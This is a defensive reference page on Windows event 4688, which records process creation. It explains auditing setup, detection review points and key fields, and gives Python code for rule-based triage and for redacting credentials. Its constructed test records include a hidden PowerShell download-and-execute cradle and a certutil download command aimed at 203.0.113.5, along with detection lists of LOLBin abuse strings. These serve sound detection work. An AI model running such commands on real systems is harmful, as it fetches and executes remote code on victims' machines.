4688 A new process has been created
Written every time a new process starts. Because it records the executable path, the parent process and (if configured) the command line, it is one of the most important events for detecting attacker activity on a host.
Overview
The subcategory is Audit Process Creation. The event is generated whenever a process is created, recording the new process path (New Process Name), the creating process (Creator Process Name) and the executing account. By default the command-line arguments are not recorded; enabling the Group Policy setting "Include command line in process creation events" adds the Process Command Line field and greatly improves detection capability.
How it is triggered
- Any process start. It appears for applications, scripts, and OS-internal activity alike.
- Command-line recording requires, in addition to Success auditing for Audit Process Creation, enabling the policy "Include command line in process creation events" (Computer Configuration > Administrative Templates > System > Audit Process Creation). The policy sets the registry value ProcessCreationIncludeCmdLine_Enabled (REG_DWORD, 1) under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit. On a stand-alone host the subcategory itself can be enabled with auditpol /set /subcategory:"Process Creation" /success:enable.
Security review points
- Parent-child relationship: detect suspicious launch chains from the pair of Creator Process Name (parent) and New Process Name (child). For example, winword.exe spawning powershell.exe, or w3wp.exe spawning cmd.exe, are improbable pairs that signal compromise.
- LOLBins (living-off-the-land binaries): track abuse of built-in OS tools, such as certutil.exe downloading files, regsvr32.exe running remote scripts, and suspicious use of mshta / rundll32 / bitsadmin.
- Command line: look in Process Command Line for encoded PowerShell (-enc / -EncodedCommand), obfuscation, stealth options such as -nop -w hidden, and external URLs.
- Also evaluate the executing account and the path of the executable (outside the standard folders, or in a temp folder).
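The review points above, turned into rule logic over 4688 records. This is an added example, not code from the original page: the records are constructed dicts carrying the 4688 field names used in the text, and the parent/child pairs, LOLBin indicator strings and path rules are illustrative assumptions that a real deployment would tune. The encoded-command handling shows the one non-obvious step, which is that PowerShell's -EncodedCommand is base64 over UTF-16LE, so the decoded text (not only the raw command line) has to be searched for URLs.

```python
"""Rule-based triage of Windows 4688 process-creation records (added example)."""
import base64
import re
from typing import Optional

# Illustrative rule tables (assumptions, not an authoritative list).
OFFICE_OR_WEB_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "w3wp.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# LOLBin name -> command-line fragments that mark the classic abuse of that tool
LOLBIN_INDICATORS = {
    "certutil.exe": ("urlcache", "-decode", "-encode"),
    "regsvr32.exe": ("scrobj.dll", "/i:http"),
    "mshta.exe": ("http", "javascript:", "vbscript:"),
    "rundll32.exe": ("javascript:", "http"),
    "bitsadmin.exe": ("/transfer", "/addfile"),
}
STEALTH_FLAGS = re.compile(
    r"-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|noni|ep\s+bypass|executionpolicy\s+bypass)", re.I)
# -e, -ec, -enc and -EncodedCommand followed by a base64 blob
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://\S+", re.I)
STANDARD_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects base64 over UTF-16LE; anything that fails either decode
    step is not treated as an encoded command."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> list:
    """Apply the review points to one 4688 record and return finding tags."""
    findings = []
    child = basename(event.get("NewProcessName", ""))
    parent = basename(event.get("CreatorProcessName", ""))
    cmd = event.get("CommandLine", "") or ""
    path = event.get("NewProcessName", "").lower()

    # 1. Parent-child relationship: Office or IIS worker spawning a shell
    if parent in OFFICE_OR_WEB_PARENTS and child in SHELL_CHILDREN:
        findings.append(f"suspicious-parent-child:{parent}->{child}")

    # 2. LOLBin abuse: built-in binary plus a telltale argument
    for needle in LOLBIN_INDICATORS.get(child, ()):
        if needle in cmd.lower():
            findings.append(f"lolbin:{child}:{needle}")
            break

    # 3. Command line: empty means the GPO is probably off, so flag that first
    if not cmd:
        findings.append("cmdline-empty:check-ProcessCreationIncludeCmdLine_Enabled")
    else:
        decoded = decode_encoded_command(cmd)
        searchable = cmd if decoded is None else cmd + " " + decoded
        if decoded is not None:
            findings.append("encoded-powershell")
        if STEALTH_FLAGS.search(cmd):
            findings.append("stealth-flags")
        if URL.search(searchable):
            findings.append("external-url")

    # 4. Executable path: temp folders and anything outside the standard dirs
    if "\\temp\\" in path:
        findings.append("temp-path")
    elif path and not path.startswith(STANDARD_DIRS):
        findings.append("non-standard-path")
    return findings


# Constructed sample records (not real telemetry); the payload is built here so
# the base64/UTF-16LE round trip is exact.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CreatorProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}",
     "SubjectUserName": "alice"},
    {"NewProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CreatorProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/x.exe C:\\Users\\Public\\x.exe",
     "SubjectUserName": "alice"},
    {"NewProcessName": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",
     "CreatorProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "",  # command line not collected on this host
     "SubjectUserName": "alice"},
    {"NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "CreatorProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" C:\\Users\\alice\\notes.txt",
     "SubjectUserName": "alice"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["CreatorProcessName"]), "->", basename(ev["NewProcessName"]), triage(ev))
```

The fourth record (Explorer launching Notepad) produces no findings, which is the point of rule-based distillation: the benign bulk of 4688 traffic drops out and only records that hit a parent-child, LOLBin, command-line or path rule reach an analyst.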
Notes for log review
- Every process start appears, so the volume is enormous. It is unmanageable unless distilled in a SIEM into correlation rules that combine parent-child relationship, command line and path.
- A blank Process Command Line most likely means the GPO above is not configured. Confirm the setting (and the ProcessCreationIncludeCmdLine_Enabled registry value) as a prerequisite for any command-line-based detection.
- The command line can contain sensitive data such as passwords, so handle it carefully during collection and retention.
- Its role overlaps with EDR telemetry and Sysmon Event ID 1 (Process Create), which records the command line, parent image and file hashes without extra configuration. When both exist, reconcile them; when only 4688 exists, be sure to enable the command-line setting.
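Because the command line can carry credentials (the note above), collection pipelines usually redact known secret-bearing arguments before the event is retained. The following is an added example of such a redaction step, not code from the original page; the patterns are heuristic assumptions covering a few common cases (net user, /pass: and -p style switches, schtasks /rp, ConvertTo-SecureString) and would need extending for other tools.

```python
"""Redact credential-bearing arguments from a 4688 command line (added example)."""
import re

REDACTED = "[REDACTED]"

# Heuristic patterns (assumptions): places where passwords commonly appear.
SECRET_PATTERNS = [
    # net user <name> <password> [/add]; skip when the 2nd token is a switch such as /delete
    re.compile(r"(net(?:\.exe)?\s+user\s+\S+\s+)(?!/)(\S+)", re.I),
    # /pass:x  /password=x  /rp x  -p x  (psexec, cmdkey, schtasks style switches)
    re.compile(r"((?<!\S)[-/](?:p|pass|password|pw|rp)[:=\s]\s*)(\"[^\"]*\"|\S+)", re.I),
    # PowerShell plaintext -> SecureString conversions
    re.compile(r"(ConvertTo-SecureString\s+)(\"[^\"]*\"|'[^']*'|\S+)", re.I),
]


def redact_command_line(cmdline: str) -> str:
    """Replace the value following each recognised credential switch with a marker.

    The switch itself is kept so the analyst still sees that a credential was
    passed on the command line, which is itself a finding worth keeping."""
    for pat in SECRET_PATTERNS:
        cmdline = pat.sub(lambda m: m.group(1) + REDACTED, cmdline)
    return cmdline


# Constructed sample command lines (not real telemetry)
SAMPLES = [
    "net user backup P@ssw0rd! /add",
    "net user backup /delete",
    "psexec.exe \\\\srv -u corp\\bob -p Hunter2 cmd",
    "cmdkey /add:srv /user:bob /pass:Secret1",
    "schtasks /create /tn t /tr calc.exe /ru svc /rp Hunter2",
    "powershell -c \"ConvertTo-SecureString 'abc' -AsPlainText -Force\"",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(redact_command_line(s))
```

Redaction is deliberately greedy: a false positive costs an argument value in the log, a false negative stores a password in plaintext for the retention period. Run the pipeline against your own fleet's common command lines to check that ordinary switches (for example -Path or -PassThru) are untouched.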
Key fields
| Field | Meaning |
|---|---|
| New Process Name | The full path of the started process |
| New Process ID / Creator Process ID | Process IDs of the child and parent, logged in hexadecimal (0x...); convert before correlating with other sources |
| Creator Process Name | The parent (creating) process; available on Windows 10 / Server 2016 and later |
| Process Command Line | The command-line arguments (only when the GPO is enabled) |
| Subject\Account Name | The account that started the process |
| Token Elevation Type | The elevation state of the new process token: Type 1 (%%1936) full token with no UAC split, Type 2 (%%1937) elevated administrator token, Type 3 (%%1938) limited token |
Glossary
- LOLBins (Living Off the Land Binaries) — abuse of legitimate tools already present in the OS. It lets attackers operate without dropping new malware, which makes file-based detection harder and shifts the burden to process and command-line telemetry such as 4688.